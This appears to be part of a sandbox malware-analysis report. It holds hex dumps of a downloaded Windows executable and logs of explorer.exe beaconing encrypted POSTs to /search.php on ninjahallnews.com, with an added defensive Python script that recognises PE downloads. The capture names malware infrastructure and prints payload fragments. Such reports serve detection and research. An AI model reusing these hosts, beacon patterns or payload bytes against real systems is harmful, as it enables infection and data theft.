                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: be c0 89 85 72 ff ff ff e9 b2 00 00 00 66 8b 85 5c ff ff ff 66 83 e0 20 75 18 9b df e0 66 83 e0 20 74 0f c7 85 72 ff ff ff 08 00 00 00 e9 8d 00 00 00 d9 ad 5c ff ff ff 9b c3 66 8b 85 36 fd ff ff 66 25 f0 7f 66 0b c0 74 1b 66 3d f0 7f 74 43 eb bb 66 8b 85 36 fd ff ff 66 25 f0 7f 66 3d f0 7f 74 30 eb a8 c7 85 72 ff ff ff 04 00 00 00 dd 05 08 fd 40 00 d9 c9 d9 fd dd d9 d9 c0 d9 e1 dc 1d f8 fc 40 00 9b df e0 9e 73 34 dc 0d 18 fd 40 00 eb 2c c7 85 72 ff ff ff 03 00 00 00 dd 05 00 fd 40 00 d9 c9 d9 fd dd d9 d9 c0 d9 e1 dc 1d f0 fc 40 00 9b df e0 9e 76 06 dc 0d 10 fd 40 00 56 57 8b 9d 6c ff ff ff 43 89 9d 76 ff ff ff f6 85 38 fd ff ff 01 75 1a fc 8d 75 08 8d bd 7a ff ff ff a5 a5 80 7b 0c 01 74 08 8d 75 10 8d 7d 82 a5 a5 dd 5d 8a 8d 85 72 ff ff ff 8d 9d 5c ff ff
                                                                                                      Data Ascii: rf\f uf tr\f6f%ftf=tCf6f%f=t0r@@s4@,r@@v@VWlCv8uuz{tu}]r\
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 55 08 74 09 8b 4d 08 83 45 08 04 89 31 ff 07 33 ff 47 33 d2 eb 04 83 c0 02 42 66 83 38 5c 74 f6 66 83 38 22 75 38 f6 c2 01 75 1f 83 7d fc 00 74 0c 66 83 78 02 22 75 05 83 c0 02 eb 0d 33 c9 33 ff 39 4d fc 0f 94 c1 89 4d fc d1 ea eb 10 4a 85 f6 74 09 6a 5c 59 66 89 0e 83 c6 02 ff 03 85 d2 75 ec 0f b7 08 66 85 c9 74 24 39 55 fc 75 0a 83 f9 20 74 1a 83 f9 09 74 15 85 ff 74 0c 85 f6 74 06 66 89 0e 83 c6 02 ff 03 83 c0 02 eb 81 85 f6 74 08 33 c9 66 89 0e 83 c6 02 ff 03 8b 7d 0c e9 30 ff ff ff 8b 45 08 3b c2 74 02 89 10 ff 07 5f 5e c9 c3 8b ff 55 8b ec 51 51 53 56 57 68 04 01 00 00 be 98 18 45 00 56 33 c0 33 db 53 66 a3 a0 1a 45 00 ff 15 78 f0 40 00 a1 a4 cc 45 00 89 35 9c 10 45 00 3b c3 74 07 8b f8 66 39 18 75 02 8b fe 8d 45 fc 50 53 8d 5d f8 33 c9 8b c7 e8 5b
                                                                                                      Data Ascii: UtME13G3Bf8\tf8"u8u}tfx"u339MMJtj\Yfuft$9Uu ttttft3f}0E;t_^UQQSVWhEV33SfEx@E5E;tf9uEPS]3[
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 75 13 a1 20 bf 44 00 3d f8 ba 44 00 74 07 50 e8 d4 a8 ff ff 59 89 1d 20 bf 44 00 53 ff d7 c7 45 fc fe ff ff ff e8 02 00 00 00 eb 30 6a 0d e8 2d d3 ff ff 59 c3 eb 25 83 f8 ff 75 20 81 fb f8 ba 44 00 74 07 53 e8 9e a8 ff ff 59 e8 9c c4 ff ff c7 00 16 00 00 00 eb 04 83 65 e0 00 8b 45 e0 e8 78 cf ff ff c3 83 3d b8 cc 45 00 00 75 12 6a fd e8 56 fe ff ff 59 c7 05 b8 cc 45 00 01 00 00 00 33 c0 c3 cc cc cc cc 55 8b ec 56 33 c0 50 50 50 50 50 50 50 50 8b 55 0c 8d 49 00 8a 02 0a c0 74 09 83 c2 01 0f ab 04 24 eb f1 8b 75 08 83 c9 ff 8d 49 00 83 c1 01 8a 06 0a c0 74 09 83 c6 01 0f a3 04 24 73 ee 8b c1 83 c4 20 5e c9 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 0c 8b 4c 24 04 85 d2 74 69 33 c0 8a 44 24 08 84 c0 75 16 81 fa 80 00 00 00 72 0e 83 3d a0 cc 45 00 00 74 05 e9
                                                                                                      Data Ascii: u D=DtPY DSE0j-Y%u DtSYeEx=EujVYE3UV3PPPPPPPPUIt$uIt$s ^T$L$ti3D$ur=Et
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 83 48 04 04 c7 45 10 91 00 00 c0 f6 c1 04 74 0e 8b 45 08 83 48 04 08 c7 45 10 8e 00 00 c0 f6 c1 08 74 0e 8b 45 08 83 48 04 10 c7 45 10 90 00 00 c0 8b 75 0c 8b 0e 8b 45 08 c1 e1 04 f7 d1 33 48 08 83 e1 10 31 48 08 8b 0e 8b 45 08 03 c9 f7 d1 33 48 08 83 e1 08 31 48 08 8b 0e 8b 45 08 d1 e9 f7 d1 33 48 08 83 e1 04 31 48 08 8b 0e 8b 45 08 c1 e9 03 f7 d1 33 48 08 83 e1 02 31 48 08 8b 0e 8b 45 08 c1 e9 05 f7 d1 33 48 08 23 cb 31 48 08 e8 30 04 00 00 84 c3 74 07 8b 4d 08 83 49 0c 10 a8 04 74 07 8b 4d 08 83 49 0c 08 a8 08 74 07 8b 4d 08 83 49 0c 04 a8 10 74 07 8b 4d 08 83 49 0c 02 a8 20 74 06 8b 45 08 09 58 0c 8b 06 b9 00 0c 00 00 23 c1 74 35 3d 00 04 00 00 74 22 3d 00 08 00 00 74 0c 3b c1 75 29 8b 45 08 83 08 03 eb 21 8b 45 08 8b 08 83 e1 fe 83 c9 02 89 08 eb 12
                                                                                                      Data Ascii: HEtEHEtEHEuE3H1HE3H1HE3H1HE3H1HE3H#1H0tMItMItMItMI tEX#t5=t"=t;u)E!E
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 1f 03 c2 8b d1 c1 f8 05 81 e2 1f 00 00 80 79 05 4a 83 ca e0 42 83 65 d8 00 83 65 e0 00 83 ce ff 8b ca d3 e6 c7 45 dc 20 00 00 00 29 55 dc f7 d6 8b 4d e0 8b 7c 8d f0 8b cf 23 ce 89 4d d4 8b ca d3 ef 8b 4d e0 0b 7d d8 89 7c 8d f0 8b 7d d4 8b 4d dc d3 e7 ff 45 e0 83 7d e0 03 89 7d d8 7c d0 8b f0 6a 02 c1 e6 02 8d 4d f8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 f0 eb 05 83 64 95 f0 00 83 e9 04 4a 79 e9 33 c0 5e 6a 1f 59 2b 0d 84 c1 44 00 d3 e3 8b 4d c8 f7 d9 1b c9 81 e1 00 00 00 80 0b d9 8b 0d 88 c1 44 00 0b 5d f0 83 f9 40 75 0d 8b 4d cc 8b 55 f4 89 59 04 89 11 eb 0a 83 f9 20 75 05 8b 4d cc 89 19 8b 4d fc 5f 33 cd 5b e8 60 78 ff ff c9 c3 8b ff 55 8b ec 83 ec 38 a1 70 b7 44 00 33 c5 89 45 fc 8b 45 08 8b 4d 0c 89 4d cc 0f b7 48 0a 53 8b d9 81 e1 00 80 00 00 89 4d c8
                                                                                                      Data Ascii: yJBeeE )UM|#MM}|}ME}}|jMZ+;|1tdJy3^jY+DMD]@uMUY uMM_3[`xU8pD3EEMMHSM
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 9d 04 00 4c 9d 04 00 60 9d 04 00 6e 9d 04 00 82 9d 04 00 90 9d 04 00 a2 9d 04 00 b0 9d 04 00 c8 9d 04 00 dc 9d 04 00 ec 9d 04 00 f8 9d 04 00 02 9e 04 00 16 9e 04 00 26 9e 04 00 3c 9e 04 00 4e 9e 04 00 64 9e 04 00 48 9c 04 00 8e 9e 04 00 a2 9e 04 00 b6 9e 04 00 c6 9e 04 00 dc 9e 04 00 ec 9e 04 00 06 9f 04 00 16 9f 04 00 2e 9f 04 00 40 9f 04 00 58 9f 04 00 6c 9f 04 00 82 9f 04 00 92 9f 04 00 a0 9f 04 00 b2 9f 04 00 c6 9f 04 00 d6 9f 04 00 e4 9f 04 00 f2 9f 04 00 00 a0 04 00 14 a0 04 00 28 a0 04 00 3e a0 04 00 52 a0 04 00 68 a0 04 00 76 a0 04 00 36 9c 04 00 24 9c 04 00 74 9e 04 00 10 9c 04 00 9a a4 04 00 8c a4 04 00 e6 a0 04 00 f6 a0 04 00 06 a1 04 00 0e a1 04 00 2a a1 04 00 42 a1 04 00 5a a1 04 00 72 a1 04 00 7e a1 04 00 8c a1 04 00 a0 a1 04 00 ae a1 04 00
                                                                                                      Data Ascii: L`n&<NdH.@Xl(>Rhv6$t*BZr~
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 64 27 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 64 79 6e 61 6d 69 63 20 61 74 65 78 69 74 20 64 65 73 74 72 75 63 74 6f 72 20 66 6f 72 20 27 00 00 00 00 60 64 79 6e 61 6d 69 63 20 69 6e 69 74 69 61 6c 69 7a 65 72 20 66 6f 72 20 27 00 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73
                                                                                                      Data Ascii: d'`managed vector copy constructor iterator'`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh vector copy cons
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
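Session 0 above is the payload fetch: a GET for /ksa9104.exe from a bare-IP host, answered with Content-Type application/x-msdos-program and a 453632-byte body whose first chunk starts with an MZ header, carries e_lfanew = 0xf0 at offset 0x3c, and has the PE signature at that offset. The Python below is an added example, not part of the Joe Sandbox report; it validates the start of a response body as a PE image instead of trusting the declared Content-Type, reports the COFF header facts, and notes when the Host header is a bare IP address. The sample body is constructed: a minimal DOS header pointing straight at a COFF header whose Machine, NumberOfSections and TimeDateStamp are the values visible in the report's first chunk (4c 01, 07 00, cd bc 63 64); the remaining fields and the sample request headers are filler.

```python
"""Recognise a Windows PE image at the start of an HTTP response body.

Added example (not part of the Joe Sandbox report). This is a minimal header
walk using PE/COFF spec offsets, not a full PE parser.
"""
import ipaddress
import struct
from datetime import datetime, timezone

MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0x01C4: "ARM", 0xAA64: "ARM64"}
PE_BODY_TYPES = {"application/x-msdos-program", "application/x-dosexec",
                 "application/vnd.microsoft.portable-executable"}


def pe_info(body: bytes):
    """Return COFF header facts if `body` starts with a PE image, else None."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    # PE signature (4 bytes) + COFF header (20 bytes) must fit in the captured bytes.
    if e_lfanew + 24 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections, stamp, _symtab, _nsyms, opt_size, flags = struct.unpack_from(
        "<HHIIIHH", body, e_lfanew + 4)
    return {
        "e_lfanew": e_lfanew,
        "machine": MACHINE_NAMES.get(machine, f"0x{machine:04x}"),
        "sections": nsections,
        "timestamp_utc": datetime.fromtimestamp(stamp, tz=timezone.utc).isoformat(),
        "optional_header_size": opt_size,
        "is_dll": bool(flags & 0x2000),          # IMAGE_FILE_DLL
    }


def assess_download(request_headers: dict, response_headers: dict, body: bytes) -> list:
    """Findings for one response; header dicts use lower-cased names."""
    findings = []
    info = pe_info(body)
    ctype = response_headers.get("content-type", "").split(";")[0].strip().lower()
    if info:
        findings.append(f"body is a {info['machine']} PE with {info['sections']} sections, "
                        f"linked {info['timestamp_utc']}")
        if ctype not in PE_BODY_TYPES:
            findings.append(f"PE body served as {ctype or 'no Content-Type'}")
    elif body[:2] == b"MZ":
        findings.append("MZ magic but no PE signature in captured bytes")
    host = request_headers.get("host", "").split(":")[0]
    try:
        ipaddress.ip_address(host)
        findings.append(f"Host is a bare IP address ({host})")
    except ValueError:
        pass
    return findings


def build_sample_pe_head() -> bytes:
    """Constructed header: MZ header at 0, COFF header right behind it at 0x40.
    Machine, NumberOfSections and TimeDateStamp are the values shown in the
    report's first chunk; every other field is filler (assumed, not captured)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew
    coff = struct.pack("<HHIIIHH",
                       0x014C,       # Machine: IMAGE_FILE_MACHINE_I386 (4c 01)
                       7,            # NumberOfSections (07 00)
                       0x6463BCCD,   # TimeDateStamp (cd bc 63 64)
                       0, 0,         # PointerToSymbolTable, NumberOfSymbols (filler)
                       0xE0,         # SizeOfOptionalHeader (filler: PE32 size)
                       0x0102)       # Characteristics (filler: EXECUTABLE_IMAGE | 32BIT_MACHINE)
    return bytes(dos) + b"PE\0\0" + coff


# Constructed request/response headers shaped like session 0 (not the report's exact set).
SAMPLE_REQUEST = {"host": "23.145.40.164",
                  "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"}
SAMPLE_RESPONSE = {"content-type": "application/x-msdos-program", "content-length": "453632"}

if __name__ == "__main__":
    head = build_sample_pe_head()
    print(pe_info(head))
    for finding in assess_download(SAMPLE_REQUEST, SAMPLE_RESPONSE, head):
        print("-", finding)
```

Checking the body rather than the declared type matters because nothing stops a server from labelling an executable as text/html or an image; the script reports that mismatch as its own finding. It also refuses to call a body a PE when the captured prefix is too short to reach the signature, so a truncated stream yields a weaker "MZ magic only" note instead of a false verdict.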


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      1 | 192.168.2.4 | 49882 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2024-10-07 22:20:42 UTC | 285 | OUT | POST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://pdafocuyeqbl.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 180
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:42 UTC180OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 21 d2 61 e2 81 ce 53 2e c1 63 19 b7 2f 9a ef 3c 28 e7 19 3e 76 dc d8 cc 47 e2 f9 73 73 94 f5 7f ba 48 58 b9 97 71 2c 5c 60 33 1b 8c 37 d7 85 b2 49 92 bc 5d 7e 31 82 46 51 cf 53 65 e6 85 ea c8 50 2d b1 12 fe 6f 9a 0b 47 aa 52 8f 20 2e 7a 26 15 d3 e6 63 84 94 12 c2 1a 71 c6 cd b4 18 d0 a1 7d af c1 a3 99 6f
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[CLj4%<!aS.c/<(>vGssHXq,\`37I]~1FQSeP-oGR .z&cq}o
                                                                                                      2024-10-07 22:20:42 UTC | 294 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 07 Oct 2024 22:20:42 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      2024-10-07 22:20:42 UTC7898INData Raw: 31 65 65 36 0d 0a 19 00 00 00 1e 0d ae 55 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa
                                                                                                      Data Ascii: 1ee6U[!`.{2Pr>iLn*"DwQmZZKQ@@V4*4"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
                                                                                                      2024-10-07 22:20:42 UTC | 18 | IN | Data Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c
                                                                                                      Data Ascii: JMQF 82
                                                                                                      2024-10-07 22:20:42 UTC | 2 | IN | Data Raw: 0d 0a
                                                                                                      Data Ascii:
                                                                                                      2024-10-07 22:20:42 UTC8192INData Raw: 32 30 30 30 0d 0a c7 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f
                                                                                                      Data Ascii: 2000CC*vH(= | _ztb8PjV7+ytfq:2VHEt4T>=*&2)_UmzKut|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
                                                                                                      2024-10-07 22:20:42 UTC6INData Raw: 97 20 09 6c 1a f8
                                                                                                      Data Ascii: l
                                                                                                      2024-10-07 22:20:42 UTC2INData Raw: 0d 0a
                                                                                                      Data Ascii:
                                                                                                      2024-10-07 22:20:42 UTC8192INData Raw: 32 30 30 30 0d 0a c5 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5
                                                                                                      Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
                                                                                                      2024-10-07 22:20:42 UTC6INData Raw: 60 4f 16 27 c7 be
                                                                                                      Data Ascii: `O'
                                                                                                      2024-10-07 22:20:42 UTC2INData Raw: 0d 0a
                                                                                                      Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49890 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:20:43 UTC | 285 bytes | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://qwngamstehwl.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 221
Host: ninjahallnews.com
2024-10-07 22:20:43 UTC | 221 bytes | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 70 ab 36 b4 db ac 42 5b e6 2c 7f 97 78 e1 ef 33 04 fa 3d 17 33 d5 eb c7 7b b2 a3 7b 1c 80 fa 2c ad 2c 27 f2 e5 10 79 29 63 06 05 cb 79 da 90 b0 42 d3 e2 4d 75 0f e4 6b 27 d1 28 68 f8 fd 84 81 4a 3a d4 0b f9 24 fa 04 28 d5 4c a3 3a 74 2c 7a 59 ee ce 09 f2 8d 24 84 4a 0b e7 d8 a9 25 ac a2 0b ba 82 fa cb 55 57 8f d7 87 5c 2c a7 0a 4d ee 75 65 2f e9 23 13 49 cd 3f 30 36 d9 bb e2 3a 22 c3 ac 65 be 60 97 e4 d8 08 15 69 29 b4 7f 47
Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lj4%<p6B[,x3=3{{,,'y)cyBMuk'(hJ:$(L:t,zY$J%UW\,Mue/#I?06:"e`i)G
2024-10-07 22:20:44 UTC | 278 bytes | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 22:20:44 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49898 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:20:44 UTC | 284 bytes | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://wuojfsenfaf.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 131
Host: ninjahallnews.com
2024-10-07 22:20:44 UTC | 131 bytes | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 4d d5 3b f4 ca f0 24 3c e2 18 6f fa 3d c1 eb 1c 73 ed 14 33 74 be e4 d4 72 fa de 13 79 d4 e1 36 b7 30 7e fd 8c 54 75 3d 79 07 0f d2 0f c2 86 9d 49 fa fd 5e 40
Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lk4%<M;$<o=s3try60~Tu=yI^@
2024-10-07 22:20:45 UTC | 278 bytes | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 22:20:45 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49902 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:20:45 UTC | 289 bytes | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://mxlgirixfokriwnb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 253
Host: ninjahallnews.com
2024-10-07 22:20:45 UTC | 253 bytes | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 6d c3 73 e1 93 c7 12 56 be 2b 73 8f 5d 9f f8 64 7e c7 12 01 3c cd b1 f7 4e c0 a9 02 67 83 f2 36 87 77 2b f9 98 76 37 42 45 3c 0a c2 2f ca d6 ce 0a ce b9 51 32 4e 92 5b 35 db 6e 40 ea 8c a3 80 56 1f c2 0e b2 4f ff 70 7c 8f 0b db 6e 6f 67 74 69 af f4 4c e8 aa 2a 97 38 01 c3 ac 96 24 ac ac 7e aa a3 a0 cd 2a 70 8c bf 82 79 29 ac 49 31 e1 2b 65 56 e2 6c 06 43 df 4b 14 04 d9 cd db 15 7b b4 d8 0b f2 7b f3 b5 a5 7b 0e 31 6c a5 1c 29 11 1b 65 ef 3c 8f b4 1d 12 15 4e 2a dc ad 3a 77 04 40 b3 91 e1 05 e4 fd 75 e1 4e cd b9 a2 81 2b
Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lh4%<msV+s]d~<Ng6w+v7BE</Q2N[5n@VOp|nogtiL*8$~*py)I1+eVlCK{{{1l)e<N*:w@uN+
2024-10-07 22:20:46 UTC | 278 bytes | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 22:20:46 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49913 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:20:46 UTC | 289 bytes | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://uefyjrrvgteesaeq.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 332
Host: ninjahallnews.com
